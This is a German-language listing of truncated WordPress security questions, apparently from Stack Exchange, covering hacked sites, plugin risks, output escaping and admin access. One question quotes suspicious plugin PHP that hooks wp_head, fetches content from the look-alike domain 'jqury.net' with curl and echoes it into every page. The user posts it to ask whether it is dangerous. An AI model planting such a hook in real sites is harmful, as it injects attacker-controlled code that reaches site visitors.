Geschlossen. Diese Frage ist nicht zum Thema . Derzeit werden keine Antworten akzeptiert. Möchten Sie diese Frage verbessern? Aktualisieren Sie die Frage, damit sie für WordPress Development Stack Exchange zum Thema gehört . Geschlossen vor 4 Jahren . Ich habe das Plugin Simple Login Lockdown installiert und seit ein paar …
Ich hatte einen Kunden, der kürzlich gehackt wurde, und ich bemerkte, dass auf ihrer Website seltsame Charaktere wie  und Æ auftauchten. Es hat sich herausgestellt, dass die Hacker das blog_charset in der wp_optionsTabelle in der Datenbank in UTF-7 geändert haben . Ich habe es auf UTF-8 zurückgesetzt, aber ich …
Ich bin neu in WordPress. Ich habe kürzlich einen Artikel darüber gelesen, wie Hacker Schwachstellen in Plugins ausnutzen können. Verschiedene Quellen wie Google Pagespeed haben mich auch davon abgehalten, Plugins zu verwenden oder zumindest auf ein Minimum zu beschränken. Ich persönlich versuche auch, Plugins zu meiden, weil ich mehr Kontrolle …
Ich entwickle gerade ein Plugin und die Chancen stehen gut, dass ich es höchstwahrscheinlich im öffentlichen Plugin-Repository veröffentlichen werde, damit andere es verwenden können. Das Plugin verwendet eine API. Um diese API zu verwenden, müssen Sie einen Benutzernamen und ein Kennwort übergeben. Daher muss mein Plugin diese Anmeldeinformationen in der …
Ich habe das in einem Plugin gefunden. Was tut es? ist es gefährlich? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }
Ich möchte sicherstellen, dass alle Daten in meinen Plugins / Themes sicher behandelt werden, bevor ich in die Datenbank gehe und sie an den Browser ausgebe. Mein Problem ist, dass es Situationen gibt, in denen die API die Bereinigung für Sie übernimmt - wie beim Speichern von Post-Meta-Feldern - und …
Ist die Beibehaltung wp-admin/install.phpund wp-admin/install-helper.phpein Sicherheitsleck in den neueren Versionen von WordPress? Standardmäßig sind die Dateiberechtigungen für diese Dateien 644. Wenn es ein Leck gibt, was bitte?
Aus heutiger Sicht passt diese Frage nicht zu unserem Q & A-Format. Wir erwarten, dass die Antworten durch Fakten, Referenzen oder Fachwissen gestützt werden, aber diese Frage wird wahrscheinlich Debatten, Argumente, Abstimmungen oder erweiterte Diskussionen hervorrufen. Wenn Sie der Meinung sind, dass diese Frage verbessert und möglicherweise erneut geöffnet werden …
Ich sehe, dass SVGs standardmäßig im Medien-Uploader blockiert sind und du sie als unterstützten MIME-Typ in functions.php hinzufügen musst. Welche Sicherheitsgründe stecken dahinter?
Ich habe mir den Code angesehen, aber ich konnte nicht feststellen, dass Funktionen wie the_title the_content the_excerptusw. fehlten . Ich habe ihn möglicherweise nicht richtig gelesen. Muss ich diesen Funktionen bei der Theme-Entwicklung entkommen, wie zum Beispiel: esc_html ( the_title () ) Bearbeiten: Wie in den Antworten unten ausgeführt, ist …
Wir haben einige Probleme mit einem externen Entwickler. Wir möchten den Zugriff auf die wp-adminSite auf den internen Zugriff beschränken (über VPN ). Einfach so wird es nicht von externen Usern angegriffen. Wir können die Administratoren auf der Website auflisten und möchten nicht, dass sie gefälscht werden. Unser Entwickler sagt, …
Nur eine kurze Frage, die ein bisschen Sicherheit bringen könnte. Ich habe festgestellt, dass in der Datei readme.html die Versionsnummer aufgeführt ist. Es wird nach jedem Upgrade erneut angezeigt, ebenso wie die Datei licence.txt und die Datei wp-config-sample.php. Gibt es eine einfache Möglichkeit, diese Dateien nach einem Upgrade von WordPress …
Das Konfigurieren von WordPress zur Aktualisierung innerhalb der Anwendung (z. B. WordPress) ist für mich aufgrund seiner Benutzerfreundlichkeit ideal. Trotzdem stören mich die Anforderungen. Die angeforderten Felder, die nach der Installation von ssh2 für PHP angezeigt werden, fragen nicht nur meinen öffentlichen, sondern auch meinen privaten Schlüssel. Ich würde denken, …
Im Codex für wp_insert_post () heißt es, dass diese Funktion "... Variablen bereinigt , einige Überprüfungen durchführt, fehlende Variablen wie Datum / Uhrzeit usw. ausfüllt" (BEARBEITEN: Ich habe den Codex-Eintrag mit einem robusteren Beispiel aktualisiert das beinhaltet Sicherheit sowie Post-Meta und Kategoriezuweisung) Ich frage mich nur, ob ich eine weitere …
Dieses Ding macht meine Codierung schwierig. Der Wordpress-Codex begründet die Verwendung von esc_url, indem er vage über Sicherheit spricht. Aber ist es die Mühe wirklich wert? Was ist zum Beispiel der wichtige praktische Sicherheitsvorteil bei der Verwendung? <?php echo esc_url( home_url( '/' ) ); ?> Anstatt von <?php echo home_url() …
We use cookies and other tracking technologies to improve your browsing experience on our website,
to show you personalized content and targeted ads, to analyze our website traffic,
and to understand where our visitors are coming from.
By continuing, you consent to our use of cookies and other tracking technologies and
affirm you're at least 16 years old or have consent from a parent or guardian.